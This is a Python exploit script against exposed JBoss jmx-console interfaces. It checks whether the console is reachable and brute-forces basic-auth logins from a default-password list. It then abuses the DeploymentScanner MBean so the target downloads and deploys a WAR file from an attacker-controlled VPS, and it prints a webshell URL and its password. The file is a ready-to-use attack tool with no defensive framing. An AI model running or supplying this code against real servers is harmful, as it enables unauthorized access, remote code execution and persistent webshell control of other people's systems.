#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File    :   JbossUnauth.py
@Time    :   2023/04/07 10:04:03
@Author  :   mingy
@Version :   1.0
@Desc    :   None
'''

import requests
from time import sleep
from requests.auth import HTTPBasicAuth

def check(target):
    print("[+] Checking target...")
    url = f"{target}/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL"
    res = requests.get(url=url, verify=False)
    if res.status_code == 200 and "URLDeploymentScanner" in res.text:
        print("[+] Target is vulnerable")
        return True
    elif res.status_code == 401:
        print("[+] Target is http auth")
        return False
    else:
        print("[-] Target is not vulnerable")
        return None

def WeakPass(target):
    username = None
    password = None
    usernames = ["admin", "jboss", "root", "user"]
    passwords = ["admin", "jboss", "root", "pass", "password", "123456"]
    print("[+] Checking weak password...")
    url = f"{target}/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL"
    res = requests.get(url=url, verify=False)
    for username in usernames:
        for password in passwords:
            try:
                response = requests.get(url, auth=HTTPBasicAuth(username, password))
                if response.status_code == 200:
                    print(f"Authenticated: {username}, {password}")
                    return username, password
            except requests.exceptions.RequestException as e:
                print(f"An error occurred: {e}")
    return None, None

def poc_1(url, host, auth=None):
    data={
        "action": "invokeOp",
        "arg0": f"http://{host}/bx3.war",
        "methodIndex": "8",
        "name": "jboss.deployment:type=DeploymentScanner,flavor=URL"
    }
    # data = f"action=invokeOp&name=jboss.deployment:type=DeploymentScanner,flavor=URL&methodIndex=8&arg0=http://{host}/bx3.war"
    res = requests.post(url=url, data=data, auth=auth, verify=False)
    return res.status_code

def poc_2(url, host, auth=None):
    data={
        "Deployer": "jboss.system:service=MainDeployer",
        "Filter": "org.jboss.deployment.scanner.DeploymentFilter",
        "FilterInstance": "org.jboss.deployment.scanner.DeploymentFilter@7f4d1d41",
        "RecursiveSearch": "True",
        "ScanEnabled": "True",
        "ScanPeriod": "",
        "StopTimeOut": "60000",
        "URLComparator": "org.jboss.deployment.DeploymentSorter",
        "URLList": f"[file:/opt/jboss/jboss4/server/default/deploy/, http://{host}/bx3.war]",
        "URLs": "",
        "action": "updateAttributes",
        "name": "jboss.deployment:type=DeploymentScanner,flavor=URL"
    }
    # data = f"action=updateAttributes&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL&URLList=%5Bfile%3A%2Fopt%2Fjboss%2Fjboss4%2Fserver%2Fdefault%2Fdeploy%2F%2C+http%3A%2F%2F{host}%2Fbx3.war%5D&Filter=org.jboss.deployment.scanner.DeploymentFilter&StopTimeOut=60000&RecursiveSearch=True&FilterInstance=org.jboss.deployment.scanner.DeploymentFilter%407f4d1d41&URLComparator=org.jboss.deployment.DeploymentSorter&Deployer=jboss.system%3Aservice%3DMainDeployer&ScanEnabled=True&ScanPeriod=&URLs="
    res = requests.post(url=url, data=data, auth=auth, verify=False)
    return res.text

def getshell(target, host, auth):
    url = f"{target}/jmx-console/HtmlAdaptor"
    res_code = poc_1(url, host, auth)
    if res_code == 200:
        print("[+] poc_1 success")
        print("[+] poc_2 start")
        result = poc_2(url, host, auth)
        sleep(5)
        bx3 = requests.get(f"{target}/bx3/bx3.jsp", verify=False)
        if "jboss.system:service=MainDeployer" in result and bx3.status_code == 200:
            print("[+] poc_2 success")
            print(f"Webshell: {target}/bx3/bx3.jsp")
            print(f"Password: rebeyond")
        else:
            print("[-] poc_2 failed")
    else:
        print("[-] poc_1 failed")

def main():
    target = input(">>> Set target url >>> ")
    vps_ip = input(">>> Set vps ip >>> ")
    vps_port = input(">>> Set vps httpServer port >>> ")
    host = f"{vps_ip}:{vps_port}"
    if check(target) == True:
        print("[+] Target is vulnerable")
        getshell(target, host, auth=None)
    elif check(target) == False:
        username, password = WeakPass(target)
        if username is not None and password is not None:
            getshell(target, host, auth=HTTPBasicAuth(username, password))
    else:
        print("[-] Target is not vulnerable")
        exit()


if __name__ == '__main__':
    main()
